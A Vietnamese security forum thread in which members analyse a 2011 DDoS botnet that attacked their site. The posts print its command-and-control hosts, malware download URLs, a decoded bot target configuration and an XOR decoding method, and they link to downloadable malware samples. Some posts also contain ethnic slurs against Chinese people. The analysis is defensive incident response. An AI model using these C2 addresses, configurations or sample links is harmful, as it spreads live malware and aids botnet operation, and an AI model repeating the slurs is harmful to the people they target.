[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 22:48:51 (+0700) | #246 | 244409
[Avatar]
bolzano_1989
Journalist
[Minus] 0 [Plus]
Joined: 30/01/2007 12:49:15
Bài gởi: 1406
Offline
[Profile] [PM]
tunghoang xem và cập nhật lại đường link mediafire tải mẫu Unikey và log của bạn nhé.
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 23:14:18 (+0700) | #247 | 244412
[Avatar]
tunghoang
Member
[Minus] 0 [Plus]
Joined: 07/12/2004 06:36:50
Bài gởi: 5
Offline
[Profile] [PM]
Autoruns: http://www.mediafire.com/?m65441j2z1b94mz
Unikey: http://www.mediafire.com/?ejodr9dwxs1dwnn
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 29/07/2011 00:41:25 (+0700) | #248 | 244415
PXMMRF
Administrator
Joined: 26/09/2002 07:17:55
Bài gởi: 946
Offline
[Profile] [PM]
TQN wrote:

.....................
Debug, trace, capture packet của nó, ra thông tin thằng host mới của STL:

Host: second.dinest.net
IP: 193.106.175.68
User-Agent: An0nym0453
xv.jpg: 2011-07-28 09:46:58
xc.jpg: <targets><item enabled="1" threads="5" delay="5" method="GET" protocol="http" host="www.hvaonline.net" port="80" uri="/" keepCookies="1" crawling="1" referer=""/></targets>


.....................................
PS: Chỉ sơ ý bỏ qua một host trong MsHelpCenter.exe mà tụi nó nhanh chân dùng host kia liền. MsHelpCenter.exe, BackupSvc.exe mang trong người nó 2-4 địa chỉ host để download file exe bot về. Host này down không được thì nhảy tới host khác.
Cái này cũng chính là cái chủ quan của em và accxxx89 (thông cảm, tên khó nhớ quá)




Đây là master webserver mới đang điều khiển cuộc tấn công DDoS vào HVA.Từ 9h sáng đến khoảng 6.30 chiều nay, HVA bị tấn công nặng nề. Sử dung cả 2 đường cáp quang của VNPT và một kết nối 3G, mà tôi không thể nào vao đươc HVA post bài.

Sự phát hiện kịp thời các master website đang in-charge (đang làm nhiệm vụ điều khiền mang bot) là một điều rất quan trong, để có biện pháp ứng phó kịp thời.
Đúng là webserver có tên miền second.dinest.net cho đến giờ này còn đang điều khiển mạng STL bot. Mang bot đang tập trung tấn công vào HVA. Tuy nhiên khoảng sau 6.30 chiều nay master webserver này thỉnh thoảng có lúc ngừng một thời gian.

Webserver second.dinest.net này có một số đăc điểm cần lưu ý:

1-Có rất it file trong hdocs (bình thường chỉ có 1 file index.html trống rỗng dung lượng chỉ khoảng 1KB và 1,2 file ảnh .jpg. Đây là các file ảnh nhúng vào các lệnh điều khiển mang bot , được mã hoá. Dung lương các file này cũng nhỏ, chỉ vài chục KB.) Nhưng webserver này sử dụng hẳn một IP tĩnh riêng cho nó (193.106.175.168). Trên webserver, như tôi đã viết, chỉ hosting 1 website duy nhất là master website, điều khiển mang bot. Quả thật là nhóm STL lắm tiền nhiều của. STL thường thiết lập các webserver chỉ chứa một website. trong đó cũng rất ít dữ liệu (file), chỉ dùng với mục đích điều khiển mang bot hay thu thập, lấy cắp thông tin cá nhân của người dung thông qua mang bot

2- Webserver second.dinest.net này cài Linux Debian, web server là Apache 2.2.9 (Note: version Apache mới nhất là 2.2.17, như đang cài trên các webserver tôi quản lý). Webserver này chỉ thường xuyên mở 2 cổng là 80 TCP HTTP và công 22 SSH TCP (service SSH-2.0 OPENSSH_5.1p1 Debian-5). Rất khó mới tìm ra được các service tại các cổng. Service SSH thỉ STL dùng để remote control webserver này từ xa (từ xa là từ VN hay TQ chẳng hạn)

3-Có một điều đặc biệt là webserver này mở rất nhiều cổng UDP mà tôi không hiểu lý do từ đâu. Có lúc tôi thấy webserver mở tới 22 cổng UDP (có cả công 53 UDP dùng config. DNS). Tôi chắc là họ chưa có kinh nghiệm trong việc bảo mật webserver và config. nó. Việc này sẽ mang đến những hậu quả không ngờ cho các bác STL. Như thế nào thì không tiện nói, hay không nên nói.

4- Đúng như anh conmale đã viết, webserver này đặt tai Nga (Russian). Vị trí địa lý của nó là ở gần giữa nước Nga, gần Mông cổ hơn cưc bắc Nga và ở phía Đông Bắc tỉnh Krasnoiac. Xin em bản đồ.






Thêm một bằng chứng về sự liên hệ của STL với một số thành phần Nga. Nhưng mối liên hệ này không có gì đáng nói so với một môi liên hệ khác với Nga, mà tôi đã nói ở trên.

Tuy nhiên dải IP 193.106.175.0-193.106.175.255 lai có thể do một công ty Pháp sở hữu. Có thể công ty Pháp này đầu tư vào miền trung nước Nga, một vùng còn chậm phát triển. Có thể TQ cũng tham đầu tư liên doanh với Pháp, xây dựng các kết cấu hạ tâng IT tai đây.

5- Domain second.dinest.net là subdomain của domain dinest.net. Nhưng không chỉ có subdomain này,
mà còn những subdomain khác. Chúng là:

- fpt.dinest.net
IP 67.19.72.202
- irc.dinest.net
IP 67.19.72.202
- mail.dinest.net
IP 67.19.72.202
- www.dinest.net
IP 67.19.72.202
- blog.dinest.net
Ip 98.124.253.253


Các subdomain này có thể là do các chiến hữu của STL quản lý, chính xác hơn là của các cấp lãnh đạo. Dễ dàng nhận thấy subdomain mail.dinest.net là quan trong nhất. Tại đây một mailserver được thiết lâp, dùng cho việc liên hệ trong khối.

6- Webserver second.dinest.net được cấu hình để các kết nối từ trình duyệt của các user-nạn nhân từ các máy zombie của họ đến webserver là các persistent connection (hay còn gọi keep-alive connection). Điều này giup cho các bot trong zombie dễ dàng, nhanh chóng liên hệ với webserver và nhận lệnh lấy cắp thông tin cá nhân, tấn công DDoS các muc tiêu trên mang. Điều này anh conmale cũng đã đề câp trong một post phía trên.

7- Trước webserver second.dinest.net STL còn đặt một server cài phần mềm "NGINX"(đọc là en-din-x), nhằm phòng và hạn chế tác hại của quá trình phản công DDoS vào webserver (second.dinest.net). Biện pháp này vừa qua Vietnamnet.net cũng đã áp dụng khi bị tán công DDoS dồn dâp trên mạng. (Chắc cũng là do STL tấn công thôi. Ở Việt nam, ngoài STL thì không ai có đủ tìền bạc, nhân lực, thời gian và trình độ kiến thức tạo lập được 1 mạng zombies-bot với hàng trăm ngàn máy, đặt trong nước ngoài nước, tấn công DDoS liên tục, năng nề vào Vietnamnet. Lý do Vietnamnet bị STL tấn công là do đây là tờ báo lề phải duy nhất dám chửi, phê phán khá mạnh mẽ hành động, ngang ngược bá quyền của TQ mà thôi. Các báo khác luôn tìm cách né tránh)
"NGINX" do một chuyên viên IT người Nga soạn thảo ra. Hiêu quả thưc tế của phần mềm-application này trong việc chống DDoS còn đang đươc bàn cãi. Chưa có công ty Mỹ nào dùng "NGINX" cả. Thưc tế "NGINX" cũng đã gây ra một vài trục trặc trên mang. Tôi cũng đã có một bài viết phân tích cụ thể hơn về "NGINX" tai topic " Sinh tử lênh.......", trong box "Những thảo luận khác"

Chúng ta đã nắm đươc các thông tin cần thiết về master webserver second.dinest.net và nhiều webserver khác của STL. Chúng vẫn có những điểm yếu. Chúng ta cần và hoàn toàn có thể phát hiện ra các master webserver của STL sớm, ngay từ khi chúng khởi đông các cuộc tấn công DDoS trên mạng, nhằm phá hủy kết cấu hạ tầng và hoạt đông thông tin mang của cộng đồng, đất nước. Bằng các cách thức từ đơn giản nhất, ai cũng có thể làm, đến các phương thức tinh vi nhất (nhiều hàm lượng trí tuệ), trong một tâp thể HVA đồng tâm hiệp lực vì công đồng, đất nước, chúng ta có thể sẽ bẻ gẫy hay hạn chế tối đa tác hai của các cuộc tấn công DDoS trên mang của STL. Không thể để STL tự tung tự tác, như ở chỗ không người, muốn hạ nhục ai thì hạ, muốn cho website nào ngừng thì phải ngừng.

Tôi sẽ gừi anh conmale một số biện pháp cần thiết, mang tính sáng tạo của người VN-"nghèo nhưng không ngu và hèn", để bàn bạc thưc hiện cùng với các bạn.(Không thể bàn công khai trên forum)


The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 29/07/2011 05:14:39 (+0700) | #249 | 244416
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
Đám STL này càng quậy, tớ càng có cảm giác đây là một đám người không biết tuổi tác ra sao nhưng lại rất tự ái, hiếu thắng và nhỏ nhen. Có hàng loạt những biểu hiện của những con người hành động không phải vì mục tiêu to lớn mà chỉ muốn trả đũa bằng mọi cách, biểu hiện của những người chưa trưởng thành.

Công bố chiến công của các bạn STL luôn để các bạn bớt bực dọc và tự ái nhá. Hôm qua lần đầu tiên các bạn làm treo con server của HVA bên nhánh bên Nhật đó. Có lẽ traffic đi từ Việt Nam được route đến con server bên Nhật nhiều hơn vì nó "short path". Dù gì đi chăng nữa, các bạn vẫn chưa thể chơi HVA đến mức thê thảm như vietnamnet trước đây. Các bạn đã vài lần dốc toàn lực của botnet để dập HVA, một forum vô vụ lợi và "self-funded" nhưng kết quả ra sao thì ai cũng thấy rồi đó.

Các bạn STL muốn kiến tạo cái gì với hàng loạt những hành động đầy phạm pháp và vô đạo đức? Nếu các bạn cho rằng vì "chính nghĩa" bảo vệ niềm tin và chế độ của các bạn mà phải làm như vậy thì các bạn hãy nghĩ lại xem: niềm tin và chế độ ấy tốt đẹp đến mức nào khi được một đám người "bảo vệ" bằng những hành động như các bạn đã và đang làm? Tổng kết lại thì các bạn đã làm gì? Các bạn ăn cắp, mạo danh, phá hoại tài sản của người khác, bôi nhọ hết người này đến người khác, phát tán và sử dụng những phương tiện độc hại. Trên mạng, hoạt động của các bạn có đầy đủ các biểu hiện như một nhóm "tin tặc" mũ đen đúng nghĩa, có nghĩa là các bạn cố giấu danh tánh, di chuyển liên tục và sử dụng những dịch vụ nổi tiếng đen tối và độc hại. Các bạn không nhận thấy rằng cả giới IT lẫn không IT đang phỉ nhổ và khinh bỉ các bạn hay sao?

Nước Việt Nam và người Việt Nam chưa hề suy đồi đến mức dẫn đến đa số ủng hộ các bạn. Bởi vậy, những việc làm của các bạn chỉ làm tệ hại hơn niềm tin và hình ảnh các bạn đang cố bảo vệ. Về khía cạnh kỹ thuật, các bạn thừa biết rằng từ nay về sau, mỗi khi các bạn tung ra một con malware và bắt đầu phá hoại thì lúc lấy những thành viên ở HVA này sẽ theo sát các bạn. Hãy tự nhìn lại những gì mình làm để sau này, khi nghĩ lại còn thấy có một chút tự hào thay vì xấu hổ và nhục nhã, ngoại trừ trường hợp các bạn cho rằng những việc làm của các bạn là chính nghĩa, đạo đức và ích lợi thì không kể.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 29/07/2011 06:17:20 (+0700) | #250 | 244417
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
Microsoft là nhóm thứ nhì hồi âm (lúc 10:12pm giờ VN) về con "AcrobatUpdater.exe":

The Microsoft Malware Protection Center (MMPC) has investigated the following file(s) which we received on 7/28/2011 3:18:31 AM Pacific Time.
Below is the determination for your submission.

========
Submission ID MMPC11072810468966

Submitted Files
=============================================
AcrobatUpdater.exe [Worm:Win32/Rebhip.A]
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 29/07/2011 06:43:46 (+0700) | #251 | 244418
[Avatar]
.lht.
Member
[Minus] 0 [Plus]
Joined: 26/09/2010 10:06:38
Bài gởi: 75
Đến từ: Inside you
Offline
[Profile] [PM]
Anh conmale full stress với STl rùi kìa smilie)
Bọn nó phá, cũng không thể phá mãi.
Càng phá bọn nó càng nhục, nhục rồi đến lúc nội bộ lục cục mà tan rã smilie)

Vụ này làm cho các thành viên trong HVA mệt mỏi, sau vụ này liệu anh TQN, conmale, PXMMRF, ... có định đi nghỉ mát không các anh ?
Trash from trash is the place for new good things ~
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 29/07/2011 08:48:26 (+0700) | #252 | 244428
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
.lht. wrote:
Anh conmale full stress với STl rùi kìa smilie)
Bọn nó phá, cũng không thể phá mãi.
Càng phá bọn nó càng nhục, nhục rồi đến lúc nội bộ lục cục mà tan rã smilie)

Vụ này làm cho các thành viên trong HVA mệt mỏi, sau vụ này liệu anh TQN, conmale, PXMMRF, ... có định đi nghỉ mát không các anh ?


Cũng không có gì mệt mỏi đâu em. Cùng lắm thì HVA bị gián đoạn khi này, khi kia thôi. Chắc member cũng thông cảm vì ai cũng có công việc, trách nhiệm, đời sống riêng nữa smilie .

HVA cứ đường đường chính chính còn những kẻ phá hoại cứ tiếp tục chui nhủi. Mỗi lần bị động ổ là lại mất server, mất tên miền, tốn kém.... Những trò phá hoại không thấy kết quả gì mà chỉ mang tiếng nhục vào thân. Đến một lúc nào đó, những con người "ảo" lẩn trốn đằng sau những trò phá hoại được "bạch hoá" thì sẽ sống với ai?

Ngay lúc này, lại là mấy trò đấm vô /hvaonline/forums/list.hva và /hvaonline/portal/list.hva và http://www.hvaonline.net mà không biết mệt. Nghĩ cũng lạ.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 29/07/2011 09:00:11 (+0700) | #253 | 244431
lequi
Member
[Minus] 0 [Plus]
Joined: 29/04/2007 18:13:32
Bài gởi: 77
Offline
[Profile] [PM]
Riêng em thì nghĩ đám này cũng chẳng tiêu tốn bao nhiêu tiền bạc vào chi phí server, domain đâu.
Bọn này làm được những trò nhơ như thế này, thì việc dùng tiền của người khác mua server, domain đâu phải là khó smilie.

P/S: Rồi đâu sẽ vào đấy, chỉ khi không làm thì người khác mới không biết, đi đêm có ngày gặp ma mà smilie
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 29/07/2011 09:36:35 (+0700) | #254 | 244434
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Lại thêm một biến thể mới nữa của AcrobatUpdater.exe xuất hiện, mới sáng nay.

Thêm nữa, quan trong:
Host speed.cyline.org đã được stl ra lệnh sống dạy.
Thằng nằm vùng uxtheme.manifest được lệnh down 2 file bmp từ file này.
Cách đây thời gian ngắn, em đã post link của nó, nay sinh phép post lại:

Code:
URL1: http://speed.cyline.org:443/flower.bmp?g={1CD70F27-EA66-4812-834C-FB39AE2DC170}&c=1&v=1&tf=312218282815&tr=312218282861&t=312218282864&p=2&e=0&n=ThangChaMayTuiSTL&u=OngNoiMayNe&lfhbbnwdbywxlineyegfswjxylrktvvfjqlr=vznmbfhxpgocvojqhosgdbenhrjtnglagonsvca

URL2: http://speed.cyline.org:443/BlueSphere.bmp?dl=1&oyeerpsaahqumkthxeswvwlfdxpizmffsfk=njhkmdjqlnkwmrofymzmxgqf


uxtheme.manifest giải mã flower.bmp cho ra link BlueSphere. Giãi mã tiếp BlueSphere.bmp cho ra 1 exe rỗng.

Hôm nay, 29_07_2011, cũng flower.bmp đó, uxtheme.manifest giải mã cho ra:
Code:
http://speed.cyline.org:443/plxzyin0fx.bmp


Cái bóng này bự bà cố luôn, giải mã ra 1 exe như Fake Unikey 1, nhưng trong resource lại chưa có gì ?
Hết hàng rồi à mấy anh stl ? Hay đang đợi coder code đống "mèo què" khác !

Toàn bộ em up ở đây:
1. FakeUnikey_29_07_2011: http://www.mediafire.com/?k29pqgh8mym4oja
2. AcrobatUpdater_29_07_2011: http://www.mediafire.com/?xzbmds3fob2q39s
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 29/07/2011 10:49:38 (+0700) | #255 | 244443
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
Các bạn STL cứ nhè URI "/" mà đập hoài vậy? Tớ vừa huy động thêm 1 con server bên Đức có 1000Mbit line đấy. Các bạn cứ tha hồ mà nhắm vào "/" để đập smilie .

Vừa kiểm lại logs thì thấy zombie cho "AcrobatUpdater.exe" đi từ các IP thuộc châu Âu, Nga, Ukraine, Mỹ, Úc (ngoài các bạn láng giềng như Hàn, Nhật và TQ). Các anti-viruses đã cập nhật def của họ để nhai sống con "AcrobatUpdater.exe" rồi. Trong vòng 1, 2 ngày tới những con này sẽ bị nhai sống từ các máy cập nhật def đều đặn.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 29/07/2011 10:54:25 (+0700) | #256 | 244444
rang0
Member
[Minus] 0 [Plus]
Joined: 25/07/2011 10:55:47
Bài gởi: 19
Offline
[Profile] [PM]
Cùng chào đón 1 server mới của STL nào :

Code:
http://map.priper.info:8080


Đây sẽ là địa chỉ để file uxtheme.manifest_29072011 connect và cập nhật (có lẽ là để thay thế cho cái speed.cyline.org)
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 29/07/2011 11:01:51 (+0700) | #257 | 244445
template
Member
[Minus] 0 [Plus]
Joined: 25/07/2011 02:18:47
Bài gởi: 16
Offline
[Profile] [PM]
Bọn này chỉ làm việc theo lệnh của bọn tàu khựa, "Sống chết theo lệnh" mà, chúng làm việc dơ bẩn để có đồng tiền dơ bẩn thôi.

Phải đập cho chúng 1 trận, còn không là chúng cứ sống chết theo lệnh mãi.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 01/08/2011 16:11:37 (+0700) | #258 | 244452
PXMMRF
Administrator
Joined: 26/09/2002 07:17:55
Bài gởi: 946
Offline
[Profile] [PM]
rang0 wrote:
Cùng chào đón 1 server mới của STL nào :

Code:
http://map.priper.info:8080


Đây sẽ là địa chỉ để file uxtheme.manifest_29072011 connect và cập nhật (có lẽ là để thay thế cho cái speed.cyline.org)


Domain này (map.priper.info) đã bị suspended
This Account Has Been Suspended


Domain-website này: "speed.cyline.org", vẫn đang active. Nhưng nhiều lúc kết nôi đến website này rất châm (slow connection)
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 01/08/2011 16:32:43 (+0700) | #259 | 244453
LlyKil
Member
[Minus] 0 [Plus]
Joined: 22/01/2008 18:33:58
Bài gởi: 16
Offline
[Profile] [PM]
Cuối cùng HVA đã "dựng" 1 cái firewall như mình mong đợi smilie
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 01/08/2011 17:28:48 (+0700) | #260 | 244455
texudo
Member
[Minus] 0 [Plus]
Joined: 20/07/2011 11:14:04
Bài gởi: 31
Offline
[Profile] [PM]
Thanks GOD (TQN, Conmale, PXMMRF ...and HVA team)...HVA ONLINE again smilie

Mấy ngày qua vào HVA ma không được, nghĩ chắc vẫn bị DDOS nặng nề lắm.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 01/08/2011 17:30:18 (+0700) | #261 | 244456
ivanst
Member
[Minus] 0 [Plus]
Joined: 18/06/2007 11:36:11
Bài gởi: 20
Offline
[Profile] [PM]
Bác com ơi , vào site bây giờ vừa khó , vừa lằng nhằng , nhiều khi hiện ra lỗi khó hiểu quá
Mong các cao thủ tiếp tục phân tích,tìm cách bem các con virut vừa ddos HVA trong 3 ngày vừa qua
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 01/08/2011 17:39:29 (+0700) | #262 | 244457
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
ivanst wrote:
Bác com ơi , vào site bây giờ vừa khó , vừa lằng nhằng , nhiều khi hiện ra lỗi khó hiểu quá
Mong các cao thủ tiếp tục phân tích,tìm cách bem các con virut vừa ddos HVA trong 3 ngày vừa qua


Đã có thông báo về sự "lằng nhằng" rồi. Hy vọng bồ dành chút thời gian để đọc thông báo. Cám ơn.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 01/08/2011 20:43:39 (+0700) | #263 | 244465
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Tụi stl đã chính thức tắt nguồn ra lệnh tấn công HVA và lên tiếng thương lượng:
Chiều nay khi HVA hoạt động trở lại, em tranh thủ check thử cái host second.dinest.net xem nó còn sống không. trong khi mấy cái khác thì closed hàng loạt. Check xong, tính post lên HVA liền, mắc cười muốn bể bụng, nhưng phải đưa "heo sữa" đi xem phim nên giờ mới post. Tối giờ cứ mắc cười hoàismilie

Dùng Fiddler, em request file xv.jpg từ second.dinest.net, ra kết quả: 2011-07-31 21:55:20.
À vậy là còn sống, ra lệnh đám bot AcrobatUpdater.exe config mới đã có ngày hôm qua. Tụi mày lên down về, làm theo lệnh.

Em down tiếp xc.jpg, Decode.exe ra, ra dòng thú vị sau trong item targets (chỉ có một mình target là HVA chúng ta thôi):
Code:
<targets>
<item enabled="0" threads="5" delay="5" method="GET" protocol="http" host="www.hvaonline.net" port="80"
rootURI="/"
uri="/hvaonline/forums/list.hva"
keepCookies="1"
crawling="1"
referer="We don't want to did that but Postmodernism forced we! Don't touch us anymore, please!"/>
</targets>


Hì hì, vậy stl hacker đã set enabled=0 cho HVA chúng ta. Các bạn đọc kỹ dòng referer nhé. Tiếng Anh em thì dốt, nói thì như cọp nhai đậu phộng, đọc thì cứ phang như tiếng Việt, nên em cứ thắc mắc ở chổ: "forced we" ? "forced we" hay "forced us" bà con ! Em nhớ mang máng là "forced us" mới đúng chứ ?

Lại mắc cười ở chổ, lúc trước, mấy anh stl hoành hoành bá đạo, đánh phá lung tung, vỗ ngực hênh hoang, coi trời bằng vung, chơi trò "bạch hoá" hèn hạ, làm nhục, bêu xấu hết người này tới người khác, "force" người ta tới đường cùng. Vậy lúc đó mấy anh có nghĩ tới lúc này không, khi mấy anh bị các hắc cơ mũ trắng, không mũ, mất mũ như anh em HVA "phọt" lại, "dầu hắc hoá" mấy anh không ? Bây giờ mấy anh lên tiếng năn nỉ, please nữa à !
Chắc là chỉ tiêu đánh phá, "ổn định chính trị" của mấy anh không đạt, bị xếp dập, phạt, trừ lương phải không mấy anh ? Tội nghiệp !

PS: À, mà mấy anh cũng thâm thật, miệng thì nói "em không muốn" vậy mà "em" cứ phang DDOS hoài hoài, hết đợt này tới đợt khác vậy à. Mấy anh gian xão giống tàu khựa vậy à ?
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 01/08/2011 20:59:56 (+0700) | #264 | 244466
mv1098
Member
[Minus] 0 [Plus]
Joined: 18/07/2009 14:19:13
Bài gởi: 119
Offline
[Profile] [PM]
@anh TQN

enabled="0" có nghĩa là họ dừng lại để cho anh post thông báo của họ lên HVA

"Don't touch us anymore, please!" có nghĩa là đừng động đến chúng tôi không thì hậu quả khôn lường, đây là lời đe doạ chứ không phải xin xỏ gì cả.

smilie
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 01/08/2011 21:06:04 (+0700) | #265 | 244467
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Vậy à, vậy thì em phải thu xếp đi học "In lit" lại rồi.
Em dùng Google Translate, dịch nó ra thành vậy, vậy tại Google đó chứ:

Chúng tôi không muốn làm điều đó nhưng Postmodernism bắt buộc chúng tôi ! Không chạm vào chúng tôi nữa, xin vui lòng!


Nếu hăm doạ thì chúng ta phải tiếp tục thôi, chứ không lẽ vì lời hăm doạ, vì DDOS mà chúng ta phải dừng lại à !
Mấy hôm nay, không vào HVA được, tiếp tục RCE cho xong các đống "mèo què" của stl từ hồi trước tới giờ.
Bắt đầu bằng Vecebot, file icon.dat của nó chứa thông tin về DDOS config của tụi nó vào xcafe hồi đó, tương tự như xc.jpg và xv.jpg bây giờ.
File icon.dat được mã hoá đơn giản hơn, chỉ bằng xor từng byte trong file với 0x1F. Sau khi xor lại với 0x1F, lòi ra hai host cũ hồi đó của stl:
Code:
safebrowser.dyndns.org/photos/safebrowser1.gif
safebrowsing.dyndns-blog.com/photos/safebrowser1.gif

Cũng lại là host trên dyndns.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 01/08/2011 21:09:32 (+0700) | #266 | 244468
ga_cum06
Member
[Minus] 0 [Plus]
Joined: 04/05/2008 19:01:15
Bài gởi: 29
Offline
[Profile] [PM]
Nói chung là dù có thế nào , dù có tấn công hay ko tấn công vào Hva thì STL đã tuyên chiến với cộng đồng mạng rồi. Có hăm doạ hay Pờ lì năn nỉ đi nữa thì cũng không thể ngừng cuộc chiến này được smilie. e nghĩ chắc giờ đây có khá nhiều ng đang âm thầm theo dõi và tìm cách tiêu diệt STL th smilie..... nhớ có câu ngày xưa xem phim chưởng "Đạo cao 1 thước ma cao 1 trượng " smilie nhưng cũng luôn có câu "Tà không thể thắng chính " smilie

Bác TQN có mail hay gì cho em phát em xin bác vài thứ cái ạ smilie) nói ở đây ko tiện smilie)
...Ước mơ xây trường học cho trẻ em nghèo Việt Nam
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 01/08/2011 21:48:42 (+0700) | #267 | 244474
mv1098
Member
[Minus] 0 [Plus]
Joined: 18/07/2009 14:19:13
Bài gởi: 119
Offline
[Profile] [PM]
@anh TQN em dịch theo ý tứ ngữ nghĩa thôi chứ không dịch sát nghĩa như anh smilie
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 01/08/2011 22:25:15 (+0700) | #268 | 244477
[Avatar]
~simon~
Member
[Minus] 0 [Plus]
Joined: 20/12/2006 15:46:42
Bài gởi: 58
Đến từ: nơi bắt đầu
Offline
[Profile] [PM]
Em đọc đến đây cũng biết được phần nào công sức của mọi người trong vụ này,hiểu được một phần câu chuyện ,nhưng thắc mắc mãi chữ STL nghĩa là gì nghĩ hoài không ra ?
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 01/08/2011 22:30:17 (+0700) | #269 | 244478
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Ặc ặc, đọc tới đây mà không biết stl là gì à ?
stl = sinh tử lệnh = sống chết theo lệnh !?
stl # STL: C++ Standard Template Library nhé. Chớ nhầm lẫn là tụi coder C++ khắp thế giới nhảy vào phang đấy.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 01/08/2011 22:42:20 (+0700) | #270 | 244479
[Avatar]
angel-pc
Member
[Minus] 0 [Plus]
Joined: 01/01/2011 01:15:32
Bài gởi: 63
Offline
[Profile] [PM]
Facebook của bọn nó nè:

https://www.facebook.com/pages/Sinh-T%E1%BB%AD-L%E1%BB%87nh/157466794320222

Ai có căm thù thì vào đó mặc sức chữi smilie

texudo
Member
[Minus] 0 [Plus]
Joined: 20/07/2011 11:14:04
Bài gởi: 31
Offline
[Profile] [PM]
We don't want to did that but Postmodernism forced we!

-> Cái này có lẽ anh văn của một thằng Khựa, nói chung dân Khựa không khá về mặt Anh văn.

Bọn stl này hoành hành từ lâu, không muốn nói tới chính trị nhưng có một mối liên hệ đặc biệt giữa stl và nhiều người làm chính trị đang bị cầm tù ở VN.

Có chăng bọn này lấy được user và pass của những người như LCD, THDT....rồi chuyển cho giới chức...để bắt họ.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 02/08/2011 04:13:02 (+0700) | #272 | 244485
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
He he, đọc cái thông điệp tiếng Anh kia đúng là tiếng Anh giọng... Việt chớ chả phải khựa quái gì hết. Văn phạm và cấu trúc câu của tiếng Hoa không thể dịch ra dòng tiếng Anh trên mà chỉ có thể từ tiếng Việt mà thôi.

Thêm nữa, mớ zombies của STL vẫn còn sống nhiều bởi vì 2 lý do:

1. Đám AV nửa mùa không thể phân tích và nhận thấy tính bất thường của con zombie cho nên không thể ra virus definition. Thất vọng nhất là đám Symantec Norton:

Symantec wrote:
We have processed your submission (Tracking #20846824) and your submission
is now closed. The following is a report of our findings for the files in
your submission:

File: AcrobatUpdater.exe
Machine: Machine
Determination: Please see the developer notes.



Symantec wrote:
---------------------------------------------------------------------------
Developer Notes
---------------------------------------------------------------------------

AcrobatUpdater.exe Our automation was unable to identify any malicious
content in this submission.
The file will be stored for further human analysis



2. Hàng chục ngàn máy ở Việt Nam, đặc biệt là ở các trường đại học và các tiệm net hoàn toàn không thèm "ke" về chuyện cập nhật antivirus def.


